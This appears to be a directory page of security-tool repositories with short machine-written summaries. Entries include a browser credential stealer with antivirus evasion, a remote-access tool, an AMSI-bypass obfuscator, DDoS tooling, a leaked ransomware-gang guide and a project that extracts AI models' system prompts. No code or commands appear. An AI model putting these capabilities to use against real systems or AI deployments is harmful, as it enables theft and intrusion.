AI Summary: Burp Bounty is a Burp Suite extension designed to enhance both active and passive scanning capabilities by allowing users to create personalized scanning rules through an intuitive graphical interface. The tool offers advanced pattern search and payload improvement features to build custom issue profiles, catering to automated and manual penetration testing workflows. A notable aspect is the availability of profiles shared by the community, which further augments its functionality.

BurpCrypto

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: BurpCrypto is a collection of encryption plugins for Burp Suite, supporting multiple encryption algorithms including AES, RSA, and DES, as well as the execution of JavaScript code for encryption tasks. Its primary use case is to enhance the capabilities of security professionals by allowing them to integrate cryptographic functions directly into their testing workflows. Notable features include a user-friendly interface for key management and seamless integration with Burp Suite’s payload processing system.

burpgpt

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: BurpGPT is an advanced security extension that integrates with Burp Suite to analyze web traffic using AI-driven techniques, specifically utilizing OpenAI’s models to uncover security vulnerabilities that conventional scanners may overlook. Its notable features include customizable prompts for tailored analysis, automated report generation summarizing potential security issues, and granular control over the analysis parameters. This tool streamlines the vulnerability assessment process, improving the efficiency and accuracy of security professionals while handling the complexities of web application security.

BurpSuite-collections

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: BurpSuite-collections is a repository containing various non-BApp Store plugins for Burp Suite, aimed at enhancing penetration testing capabilities. Notable features include SQL injection detection, automated SSRF vulnerability scanning, and the ability to manage variables within Burp, allowing security professionals to effectively discover and exploit vulnerabilities. The project serves primarily as a resource for learning and research related to Burp Suite plugins.

README

Burp-Suite-collections

BurpSuite 相关收集项目，插件主要是非BApp Store（商店）

所有的汉化或者使用burpsuite都是在你配置好了Java环境的前提下！！！相关教程

最新版（202212之后）~~激活参考这个项目自己解决，本项目不提供~~

buster

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Buster is a comprehensive Open Source Intelligence (OSINT) tool designed for email reconnaissance, capable of gathering social account links, breaches, and associated domains for a given email address. Notable features include the ability to generate potential emails and usernames, verify existing emails, and query various online sources and databases for comprehensive results. The tool is particularly useful for security researchers and investigators needing to gather detailed information on individuals or validate email addresses.

ByePg

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: ByePg is a kernel-level tool that circumvents Windows PatchGuard and HVCI by leveraging an early-bugcheck hook through the hijacking of the HalPrivateDispatchTable. Its primary use case is to facilitate the implementation of exception-based hooks, allowing for the registration of high-level system-wide exception handlers and offering capabilities for kernel manipulation previously restricted by PatchGuard. Notably, the tool includes a base library and various examples that demonstrate syscall hooking and SEH handling, showcasing its potential for creating new attack surfaces.

bypass-firewalls-by-DNS-history

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The “Bypass firewalls by abusing DNS history” tool automates the process of discovering direct IP addresses of servers behind web application firewalls (WAFs) by leveraging historical DNS records. Its primary use case is for security professionals, including bug bounty hunters, aiming to uncover misconfigured servers or outdated versions of websites that may be vulnerable to exploits. Notable features include the ability to output confidence levels based on HTML response similarities and support for fetching IPs of subdomains to enhance bypass attempts.

C2-Tracker

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: C2 Tracker is a community-driven IOC feed that aggregates IP addresses related to known malware, botnets, and command-and-control (C2) infrastructures by leveraging searches from platforms like Shodan. Its primary use case is to facilitate threat intelligence by providing a regularly updated feed that can be ingested by various SIEM and EDR systems, enhancing detection and investigation capabilities. Notable features include version-controlled historical data, weekly updates, and compatibility with tools like OpenCTI and FortinetSIEM for streamlined integration and alerting.

caddy-waf

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Caddy WAF is a customizable middleware for the Caddy web server that functions as a Web Application Firewall, designed to provide advanced protection against a wide range of web-based threats. Key features include regex-based filtering, IP blacklisting, geo-blocking, rate limiting, anomaly scoring, and detailed monitoring capabilities, all aimed at securing applications while ensuring high performance through techniques like zero-copy networking and wait-free concurrency. The tool also supports seamless dynamic configuration reloads and offers precise insights into traffic and security events, making it a robust solution for safeguarding web applications.

cai

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Cybersecurity AI (CAI) is a robust framework designed for enhancing cybersecurity measures by leveraging artificial intelligence. Its primary use case involves threat detection and incident response, making it suitable for both community and professional environments. Notable features include multi-platform support, advanced token management in the Professional Edition, and real-time performance benchmarks that are accessible for evaluation.

README

Cybersecurity AI (`CAI`)

caido

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Caido is a web application auditing tool designed for security professionals and enthusiasts, facilitating efficient and user-friendly assessments of web application security. It features regular software updates, a comprehensive dashboard for managing audits, and a community platform for user support and engagement.

README

Website • Dashboard • Docs • Roadmap • Branding • Discord

👋 Welcome

Welcome to Caido!

Caido aims to help security professionals and enthusiasts audit web applications with efficiency and ease.

cameradar

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Cameradar is a tool designed for scanning RTSP endpoints on authorized targets, utilizing dictionary attacks to discover credentials and stream routes. Its primary use case is to assess the security of RTSP streams by detecting open hosts, identifying device models, and generating comprehensive reports of findings. Notable features include the ability to enumerate multiple RTSP stream routes and credentials through customizable dictionaries, as well as support for Docker for streamlined deployment.

can-i-take-over-dns

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The “Can I Take Over DNS?” tool is a resource for security researchers that identifies DNS providers and assesses their vulnerability to DNS takeover attacks. It features a comprehensive list of DNS providers, along with their statuses, fingerprints, and guidance for conducting takeover attempts, facilitating informed bug bounty reporting. The project encourages community contributions to enhance its coverage and accuracy in identifying potential vulnerabilities.

README

Can I Take Over DNS?
^{_{A list of DNS providers and whether their zones are vulnerable to DNS takeover!
^{Maintained by}}}

Inspired by the popular Can I Take Over XYZ? project by @EdOverflow this project is uniquely oriented towards DNS takeovers. DNS takeovers pose a high threat to companies, warrant high bounties, and are easy to find. We are trying to make this list comprehensive, so please contribute!

CANalyzat0r

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: CANalyzat0r is a modular and extensible tool designed for analysis and management of Controller Area Network (CAN) traffic, including support for CAN FD. It features a graphical user interface for comfortable analysis, multi-interface support, project management capabilities, and advanced functionalities such as threaded sending, fuzzing, and packet filtering, making it a comprehensive solution for CAN traffic analysis and experimentation.

README

This software project is a result of a Bachelor’s thesis created at SCHUTZWERK in collaboration with Aalen University by Philipp Schmied (@CaptnBanana).

cansina

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Cansina is a web content discovery application designed to identify hidden resources in web applications by sending requests and analyzing responses. Its primary use case is for penetration testing, offering features such as data persistence with SQLite, multithreading, customizable headers, and comprehensive filtering options. Notable functionalities include support for multiple wordlists, SSL and proxy capabilities, and integrated tree viewing of results, making it a versatile tool for security professionals.

CAPEv2

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: CAPE (Malware Configuration And Payload Extraction) is an advanced malware sandbox designed to execute and analyze malicious files in an isolated environment while capturing dynamic behavior and forensic artifacts. Key features include automated malware unpacking, YARA signature-based classification, comprehensive API hooking for behavioral instrumentation, and detailed memory and network traffic analysis. CAPE enhances traditional sandboxes with interactive desktop capabilities and sophisticated unpacking techniques, making it a powerful tool for malware research and analysis.

capsulecorp-pentest

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Capsulecorp Pentest is a pre-configured virtual network environment designed for learning network penetration testing, utilizing Vagrant and Ansible to deploy five virtual machines, including a Linux attacker and four Windows 2019 servers with vulnerable services. This tool streamlines the setup process, allowing users to quickly launch a fully functional Active Directory domain for educational purposes, with included features like a vulnerable Jenkins server, Apache Tomcat, and Metasploit. Its primary use case is to facilitate hands-on pentesting practice in a controlled environment, enhancing learning efficiency.

CaptfEncoder

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: CaptfEncoder is an open-source, cross-platform network security tool suite designed for code conversion, cryptography, and a variety of online query tools. It features a wide range of encoding methods, classical ciphers, and modern cryptographic algorithms, enabling users to perform tasks such as data encoding, encryption, and security analysis efficiently. The tool is built in Rust, ensuring enhanced performance and supports a variety of operating systems including Windows, Linux, and macOS.

cargo-auditable

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: cargo-auditable is a Rust tool that embeds the dependency tree of a Rust executable in JSON format within the compiled binary, allowing for precise auditing of crate versions against known vulnerabilities. It facilitates vulnerability scanning in production without additional bookkeeping, supporting major operating systems and WebAssembly. Notably, it integrates seamlessly with existing Cargo commands and works in conjunction with tools like cargo-audit to enhance security practices in Rust development.

CatSniffer

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: CatSniffer is a versatile multiprotocol and multiband hardware tool designed for the sniffing, communication, and exploitation of Internet of Things (IoT) devices. It supports various wireless technologies, including LoRa, Sub-1 GHz, and 2.4 GHz, and is compatible with multiple third-party software applications, allowing customization and extensive functionality for IoT security researchers and developers. Key features include a built-in USB-UART bridge, support for various protocols, and a flexible design that enables the integration of different antennas and easy programming.

CDK

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: CDK is a zero dependency container penetration toolkit designed for security testing, enabling stable exploitation across slimmed containers. Its primary use case revolves around container escaping, persistence, and lateral movement within Kubernetes clusters, featuring modules for evaluating container weaknesses, executing various exploits, and providing essential network tools. Notable capabilities include information gathering, direct interaction with the container’s environment, and the ability to initiate and manage attacks seamlessly.

README

CDK - Zero Dependency Container Penetration Toolkit

English | 简体中文

censys-subdomain-finder

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Censys Subdomain Finder is a command-line tool designed to enumerate subdomains associated with a specified domain using Certificate Transparency logs from Censys. It retrieves subdomains that have ever been issued an SSL certificate by a public Certificate Authority, offering features such as output to a text file and support for API authentication. Notably, users must set up an account with Censys to access the API, as free accounts will face limitations beginning in late 2024.

cent

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Cent is a tool designed to organize community-contributed Nuclei templates, simplifying the process of managing and utilizing these resources for vulnerability scanning. Key features include the ability to clone templates from multiple repositories, validate their integrity, and generate detailed summaries of the templates’ metadata, including statistics on validation and severity distribution. Additionally, Cent supports multi-threading for efficient repository management and offers commands for initializing configurations, updating templates, and accessing versioning information.

certificates

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: step-ca is an online certificate authority designed for secure and automated certificate management in DevOps environments. It features the capability to issue HTTPS and TLS certificates for various services like VMs, containers, and APIs, as well as SSH certificates, while supporting automated certificate management through ACME protocols. Its flexibility allows users to select key types and certificate lifetimes, making it an essential tool for managing cryptographic needs within modern infrastructures.

chain-bench

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Chain-bench is an open-source tool designed for auditing software supply chain security compliance based on the CIS Software Supply Chain benchmark. It examines the entire Software Development Life Cycle (SDLC) to identify risks from code inception to deployment, ensuring adherence to organizational security policies. Notable features include CLI-based scanning capabilities, integration options with various SCM platforms, and support for Docker deployment.

README

📖 Documentation

Chain-bench is an open-source tool for auditing your software supply chain stack for security compliance based on a new CIS Software Supply Chain benchmark. The auditing focuses on the entire SDLC process, where it can reveal risks from code time into deploy time. To win the race against hackers and protect your sensitive data and customer trust, you need to ensure your code is compliant with your organization’s policies.

changeme

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: changeme is a default credential scanner designed to identify default and backdoor credentials, with a focus beyond common credentials. It features support for multiple protocols, including HTTP, MSSQL, MySQL, PostgreSQL, SSH, SNMP, and FTP, and allows users to easily configure new credentials via YAML files without code changes. The tool offers flexible target loading options and can run efficiently using Docker, particularly with Redis as a queue backend, making it suitable for diverse scanning tasks across network environments.

CHAOS

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: CHAOS is an open-source Remote Administration Tool developed in Golang, designed for generating binaries that facilitate control over remote operating systems. It features robust capabilities such as reverse shell access, file manipulation (upload, download, delete), remote system information retrieval, and several system control functions like shutdown and restart, making it a versatile tool for remote administration tasks across both Windows and Linux platforms.

README

CHAOS: Remote Administration Tool

cheatsheets

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Cyber Detective Cheatsheets repository provides a comprehensive collection of cheat sheets focused on various aspects of Open Source Intelligence (OSINT) gathering techniques. Notable features include easily accessible text versions of cheat sheets on topics such as username, email, and reverse image OSINT, as well as guides for information gathering from companies and geolocation data. This tool serves as a practical resource for security professionals and investigators looking to streamline their OSINT processes.

Chimera

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Chimera is a PowerShell obfuscation script designed to evade Detection and AMSI mechanisms by transforming potentially malicious PowerShell scripts into less recognizable forms. Its primary use case is for penetration testing and research into bypassing antivirus signatures, utilizing advanced techniques like string substitution and variable concatenation. Notable features include the capability to digest and obfuscate known malicious scripts while effectively bypassing security detection tools, thereby demonstrating the vulnerabilities in existing AV signatures.

chromepass

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Chromepass is a Python-based console application designed to decrypt saved passwords and cookies from various web browsers, including Google Chrome, Chromium, and others. Its primary use case is for extracting sensitive credentials with minimal detection by antivirus software through custom build methodologies. Notable features include the ability to remotely send the recovered data, customizable error messages, and a tailored user interface.

README

Chromepass - Hacking Chrome Saved Passwords and Cookies

View Demo · Report Bug · Request Feature

Ciphey

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Ciphey is a fully automated tool designed for decryption, decoding, and cracking of encoded data, leveraging natural language processing and artificial intelligence techniques. Its primary use case is to assist cybersecurity professionals and enthusiasts in deciphering encrypted messages and files without requiring prior knowledge of the encryption methods used. Notable features include support for various installation methods (Python, Docker, MacPorts, Homebrew) and a user-friendly interface that simplifies the decryption process.

CL4R1T4S

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: CL4R1T4S is a transparency and observability tool designed to extract and provide insights into the system prompts and guidelines used by major AI models and agents from various organizations. Its primary use case is to enable users to understand the underlying instructions that shape AI behavior, thereby fostering trust and accountability in AI interactions. Notable features include the ability to leak, extract, or reverse-engineer model prompts and contributions from users for a broader understanding of AI systems.

clairvoyance

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Clairvoyance is a tool designed to extract GraphQL API schemas even when introspection is disabled, thereby facilitating schema discovery in environments such as production where introspection is typically forbidden. It outputs the schema in a JSON format compatible with other visualization and analysis tools, and it can be easily installed via pip or Docker, allowing users to customize their schema extraction processes using various wordlists.

README

Clairvoyance

Obtain GraphQL API schema even if the introspection is disabled.

ClatScope

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: ClatScope is an advanced OSINT tool designed for comprehensive online reconnaissance, catering to investigators and cybersecurity professionals. It consolidates data from multiple APIs to deliver insights on IP addresses, domains, emails, and personal data, while offering features such as username verification across numerous platforms, phone number validation, and email security checks. ClatScope Mini provides a simplified version for quick operations without API configuration, making it accessible for immediate use.

claude-bug-bounty

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Claude Bug Bounty is an AI-powered agent harness tailored for professional bug bounty hunting, enabling users to streamline their testing processes. It intelligently orchestrates over 25 tools, remembers past findings across targets, validates vulnerabilities to reduce false positives, and generates ready-to-submit reports in under a minute. Notable features include Burp MCP integration for live traffic monitoring and an autonomous hunting mode that simplifies the testing workflow.

README

Claude Bug Bounty

The AI-Powered Agent Harness for Professional Bug Bounty Hunting

Your AI copilot that sees live traffic, remembers past hunts, and hunts autonomously.

cli

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: CloudGraph is an open-source tool that serves as both a GraphQL API and a Cloud Security Posture Management (CSPM) solution, providing comprehensive compliance checks and type-safe asset inventories across AWS, Azure, GCP, and Kubernetes. Key features include automatic query validation, historical data snapshots, and a unified endpoint for querying resources across multiple cloud environments. Designed for ease of use, CloudGraph allows users to quickly assess their cloud infrastructure and maintain compliance with various security standards.

cli

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Step CLI is a robust command-line interface tool designed for building and managing Public Key Infrastructure (PKI) systems and workflows, providing functionalities for cryptographic operations and X.509 certificate management. Key features include the ability to create, revoke, and validate certificates, generate key pairs and Certificate Signing Requests (CSRs), and automate certificate issuance via integration with the step-ca server and ACME-compliant CAs. The tool simplifies the setup and maintenance of secure TLS/HTTPS environments, making it essential for developers and system administrators working with PKI.

Cloakify

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: CloakifyFactory is a tool designed for text-based steganography that transforms any file type into a list of innocuous strings, enabling covert data exfiltration and infiltration while evading detection by data loss prevention systems and analysts. Key features include the ability to cloak various file formats, social engineering capabilities to mislead security reviews, and the option to add noise for enhanced resistance against frequency analysis. It serves as an educational tool for introducing concepts of cryptography and steganography, though it is not secure for sensitive data without prior encryption.

cloud_enum

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: cloud_enum is a multi-cloud OSINT tool designed for the enumeration of public resources across AWS, Azure, and Google Cloud Platform. Its notable features include the ability to identify open and protected cloud resources, such as S3 buckets, Azure storage accounts, and Firebase databases, utilizing customizable keyword inputs for comprehensive scanning. Although currently less maintained, the tool is positioned for migration to the Nuclei framework for improved functionality and community contributions.

CloudBrute

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: CloudBrute is a reconnaissance tool designed for uncovering infrastructure, files, and applications across major cloud providers, including Amazon, Google, Microsoft, and others. Its primary use case targets bug bounty hunters, red teamers, and penetration testers, providing features such as black-box detection, user-agent and proxy randomization, and modular customization to facilitate efficient cloud enumeration and vulnerability assessment without requiring authentication.

README

CloudBrute

A tool to find a company (target) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode). The outcome is useful for bug bounty hunters, red teamers, and penetration testers alike.

CloudFail

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: CloudFail is a reconnaissance tool designed to uncover the origin server of targets protected by Cloudflare by utilizing three distinct attack phases: misconfigured DNS scans, querying the Crimeflare database, and brute-forcing over 2500 subdomains. The tool operates through Tor to maintain anonymity while performing these scans, making it particularly useful for security researchers conducting penetration tests or academic inquiries. Key features include seamless integration with Tor for privacy, a focus on potential DNS misconfigurations, and an easy-to-use scanning interface.

Coercer

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Coercer is a Python tool designed for assessing and exploiting Remote Procedure Calls (RPCs) on Windows servers, facilitating the coercion of authentication onto arbitrary machines. Key features include the ability to list and connect to SMB pipes, invoke vulnerable RPC functions with random UNC path generation, and customizable export formats such as SQLite, JSON, and XSLX for scan and fuzz modes. It supports both authenticated and unauthenticated scans, making it valuable for security assessments and penetration testing.

collection-document

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Collection Document repository is a curated compilation of quality safety articles aimed at enhancing knowledge in various cybersecurity domains. Its primary use case includes providing resources on topics such as penetration testing, threat detection, cloud security, and personal security, among others. Notable features of the collection include links to deep dives into specialized security areas, ongoing updates, and insights into modern security solutions like AI safety and zero trust architecture.

commix

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Commix is an open-source penetration testing tool designed for automating the detection and exploitation of command injection vulnerabilities in web applications. It supports multiple Python versions and includes extensive documentation with usage examples, facilitating ease of deployment and operation for security professionals. Notable features include comprehensive exploitation capabilities and a user-friendly interface for navigating various commands and options.

README

Commix (short for [comm]and [i]njection e[x]ploiter) is an open source penetration testing tool, written by Anastasios Stasinopoulos (@ancst), that automates the detection and exploitation of command injection vulnerabilities.

console

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Phase Console is an open-source platform designed for engineering teams to efficiently manage and secure application secrets throughout the development lifecycle. Its notable features include a comprehensive dashboard for secret management, role-based access control, seamless integration with various CI/CD platforms and Kubernetes, as well as SDK support for multiple programming languages, enabling secure secret injection and synchronization across environments.

README

Repos

ContainerSSH

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: ContainerSSH is an SSH server designed to dynamically launch containers in Kubernetes and Docker, primarily aimed at facilitating lab environments, debugging production systems, and running honeypots. Notable features include ephemeral container management with automatic cleanup, secure and logged access for developers, and comprehensive auditing capabilities that allow for monitoring and analysis of SSH attack patterns. This tool enhances security workflows by leveraging containerization to isolate user activities and preserve system integrity.

content

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: ComplianceAsCode/content is a framework designed to facilitate the creation and maintenance of security policy content for various platforms, including Linux distributions and applications like Firefox. It generates SCAP content, Ansible playbooks, and Bash scripts from easily editable YAML rule files, allowing organizations to automate compliance checks and remediations. Notable features include a powerful build system that reduces redundancy, multi-format outputs tailored to different organizational needs, and comprehensive documentation resources for users.

conti-pentester-guide-leak

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The “conti-pentester-guide-leak” repository serves as an archive for leaked pentesting materials associated with the Conti ransomware group, providing insights into their methodologies and tools. It includes guides on a variety of techniques such as data exfiltration, network exploitation, and the usage of tools like Metasploit and Cobalt Strike. This material is aimed at enhancing pentesting skills for security professionals and aiding defenders in detecting and mitigating similar attacks, while emphasizing its usage for educational purposes only.

copacetic

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Copa is a CLI tool designed to directly patch container images for vulnerabilities without requiring a full rebuild, thereby enhancing DevSecOps workflows. Leveraging vulnerability scan results from tools like Trivy, Copa reduces the operational downtime associated with patching, minimizes storage needs by creating only additional patch layers, and allows any user to perform patches, irrespective of image ownership. Its extensible architecture supports multiple package managers and vulnerability report formats, making it adaptable to various container ecosystems.

copilot-api

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Copilot API Proxy is a reverse-engineered tool that enables access to the GitHub Copilot API through an OpenAI and Anthropic-compatible interface, allowing integration with various platforms that support these APIs. Key features include a user-friendly web dashboard for monitoring API usage, flexible authentication options, rate limit management, and the capability to integrate with Claude Code for enhanced coding assistance. This proxy is not officially supported by GitHub and should be used responsibly to prevent account restrictions.

Corsy

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Corsy is a lightweight CORS misconfiguration scanner designed to identify vulnerabilities in web applications’ Cross-Origin Resource Sharing implementations. It features a versatile command-line interface that supports scanning URLs directly or from files, utilizes customizable HTTP headers, and provides options for threading, request delays, and exporting results to JSON. Notably, it implements a comprehensive suite of tests to uncover various CORS-related bypass opportunities.

README

Corsy

CORS Misconfiguration Scanner

Covenant

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Covenant is a .NET command and control framework designed for red teaming, facilitating offensive .NET tradecraft and collaborative operations through a web-based interface. It supports cross-platform functionality across Linux, MacOS, and Windows, and features multi-user collaboration, dynamic C# compilation, inline code execution, and secure communication via an encrypted key exchange. Notably, Covenant offers API-driven extensibility and a user-friendly dashboard that allows red teamers to execute and manage operations effectively.

Cpp2IL

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Cpp2IL is a tool designed to reverse Unity’s IL2CPP build process, converting Unity games’ compiled binary formats back into their original managed DLLs. Its primary use case is for developers and reverse engineers working with Unity-based applications, providing functionalities such as output format customization and a planned plugin system for extended compatibility. Noteworthy features include a major rewrite for enhanced flexibility, reliance on LibCpp2IL for metadata processing, and the upcoming integration of an intermediate representation (ISIL) for improved analysis of various instruction sets.

Cr3dOv3r

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Cr3dOv3r is a Python-based tool designed for detecting credential reuse vulnerabilities by querying public data leaks and verifying whether compromised credentials can access popular websites. Its notable features include integration with the Have I Been Pwned API for leak search and functionality to test the validity of leaked passwords against various online platforms while detecting CAPTCHA prompts. This tool is particularly useful for penetration testing and security assessments.

Cracker-Tool

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Cracker-Tool is a multifunctional hacking and penetration testing toolbox designed for Termux users, featuring a variety of capabilities including IP tools, subdomain scanning, DDoS attacks, SQL injections, and more. Notable functionalities include Cloudflare bypass for DDoS, identity generators, and a variety of administrative tools, making it a comprehensive resource for security testing. The tool is implemented in Python and Bash, emphasizing ease of installation and set up within the Termux environment.

crawlergo

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: crawlergo is a robust web vulnerability scanner that utilizes a headless Chrome browser to collect URLs and interact with web pages, capable of intelligent form submission and JavaScript event triggering. Its key features include automatic URL de-duplication, support for different browser environments, request proxying, and the ability to push results to passive vulnerability scanners, making it an essential tool for comprehensive web application security assessments.

README

crawlergo

crlfuzz

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: CRLFuzz is a specialized tool for detecting CRLF injection vulnerabilities in web applications, developed in Go for high performance. It offers flexible scanning options, including targeting individual URLs or multiple URLs from a list, and provides various command line flags to customize request methods, output results to files, and adjust concurrency levels. Notable features include support for custom headers, proxy usage, and integration capabilities with other security tools through standard input.

CrossLinked

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: CrossLinked is a LinkedIn enumeration tool that leverages search engine scraping to extract valid employee names from targeted organizations, enabling enumeration without the need for API keys or direct LinkedIn access. It supports customizable naming conventions for output formatting and offers features like proxy rotation and the ability to parse data into both text and CSV files. This tool is particularly useful for security researchers and penetration testers looking to gather information about potential targets.

Crucix

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Crucix is an open-source intelligence tool that aggregates real-time data from 27 diverse sources—including satellite fire detection, flight tracking, and economic indicators—into a single, self-hosted dashboard updated every 15 minutes. Its primary use case is to provide researchers, journalists, and analysts with accessible, cross-correlated insights without relying on cloud services or subscriptions. Notable features include integration with LLMs for two-way interaction, customizable alerts via Telegram and Discord, and a user-friendly interface that simplifies monitoring complex global events.

crypto-attacks

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The crypto-attacks repository provides Python implementations of various cryptographic attacks and utilities, primarily focusing on attacking RSA using methods such as the Boneh-Durfee attack. Notable features include the ability to customize parameters for specific attacks, integration with SageMath for advanced mathematical computations, and a structured approach for unit testing and utilizing the attack scripts.

README

Introduction

Python implementations of cryptographic attacks and utilities.

Requirements

SageMath with Python 3.9
PyCryptodome

You can check your SageMath Python version using the following command:

cs-suite

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Cloud Security Suite (cs-suite) is a command-line tool designed for conducting security audits on various cloud environments, including AWS, GCP, Azure, and DigitalOcean. Its primary use case revolves around gathering data for Lynis audits, allowing users to specify environments, IP addresses, and user credentials while generating audit logs in JSON format for integration with SIEM tools. Notable features include the ability to handle user authentication, option to wipe previous audit reports, and flexible configurations for different cloud platforms.

CS7038-Malware-Analysis

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: CS7038-Malware-Analysis is a repository designed for educational purposes in the field of malware analysis, specifically for the University of Cincinnati’s course. It serves as a comprehensive resource for students, providing access to course materials and related multimedia content, including instructional videos on malware analysis techniques and methodologies.

README

CS7038-Malware-Analysis

Course Repository for University of Cincinnati Malware Analysis Class (CS[567]038)

Public URL: https://class.malware.re/

YouTube Videos: https://www.youtube.com/channel/UC0qfXmyAbSsmnisGQn1fAJA

CTF

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Crypto-Cat/CTF repository serves as a comprehensive resource for Capture The Flag (CTF) challenges, offering write-ups, scripts, and files aligned with video walkthroughs. Its primary use case is to aid users in learning and solving various CTF challenges through curated links to additional resources, including pentesting and reverse engineering tools. Notable features include an extensive directory of CTF platforms, resources for blue team activities, and a collection of cybersecurity educational content.

CTF-notes

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The CTF-notes repository provides a comprehensive collection of resources and structured notes aimed at aiding individuals in preparing for Capture The Flag (CTF) competitions and penetration testing exams, such as the OSCP. It includes detailed checklists, exploitation techniques for various platforms, vulnerability payloads, and methodologies for offensive security. Noteworthy features include organized sections for post-exploitation tactics, memory forensics, and specific vulnerabilities, alongside a dedicated cheat sheet repository for quick reference during assessments.

ctf-skills

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The ctf-skills repository provides an extensive collection of agent skills designed to facilitate the solving of Capture The Flag (CTF) challenges across various domains, including web exploitation, binary pwn, reverse engineering, and more. Notable features include support for multiple installation methods, a comprehensive tool installer script, and detailed skill documentation for on-demand use, allowing users to efficiently integrate the necessary tools as challenges arise. It is compatible with any tool adhering to the Agent Skills specification, enhancing its versatility in competitive cybersecurity contexts.

CTFCrackTools

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: CTFCrackTools X is a next-generation, node-based toolkit designed for CTF (Capture The Flag) competitions, offering an extensive set of over 43 built-in algorithms for encoding, cryptography, and hashing. Key features include a visual workflow that allows users to construct custom encoding and decoding processes intuitively, and native support across Windows, macOS, and Linux platforms without the need for additional runtime installations. The tool emphasizes performance and extensibility, streamlining the process of handling various CTF challenges.

CTFever

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: CTFever is a comprehensive toolkit designed for Capture The Flag (CTF) participants, offering a variety of utilities to assist in solving challenges. It includes a range of tools for tasks such as encoding/decoding, cryptography, and data analysis, featuring notable options like Base64 encoding, Caesar ciphers, and hash calculations. This resource is particularly beneficial for cybersecurity enthusiasts engaged in competitive environments, aiming to streamline their workflow and enhance their problem-solving capabilities.

ctfr

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: CTFR is a tool designed to extract subdomains from HTTPS websites by leveraging Certificate Transparency logs, rather than employing conventional dictionary or brute-force attacks. Its primary use case is for cybersecurity professionals and researchers to quickly enumerate subdomains for a given target domain, with features that allow output to a specified file. The tool is straightforward to install and run, requiring only Python and pip, and offers a simple command-line interface for usage.

CTFs

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: CTFs is a repository containing write-ups and resources for various Cyber Capture The Flag (CTF) challenges. It offers a comprehensive cheat sheet detailing strategies and techniques across diverse categories, including forensics, binary exploitation, web challenges, and cryptography. Notable features include curated educational resources, practice sites, and a web mirror for easy access.

README

CTFs

Writeups / Files for some of the Cyber CTFs that I’ve done

I’ve also included a list of CTF resources as well as a comprehensive cheat sheet covering tons of common CTF challenges

ctftool

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: ctftool is an interactive command-line tool designed for exploring and experimenting with the CTF protocol used in Windows for Text Services. Its primary use case includes studying Windows internals, debugging Text Input Processors, and analyzing security within the CTF environment, with notable features such as support for scripting, automated interactions, and various commands for managing connections and clients. The tool is compatible with Windows 7, 8, and 10, supporting both 32-bit and x64 architectures.

cve

Mon, 30 Mar 2026 00:00:00 +0000

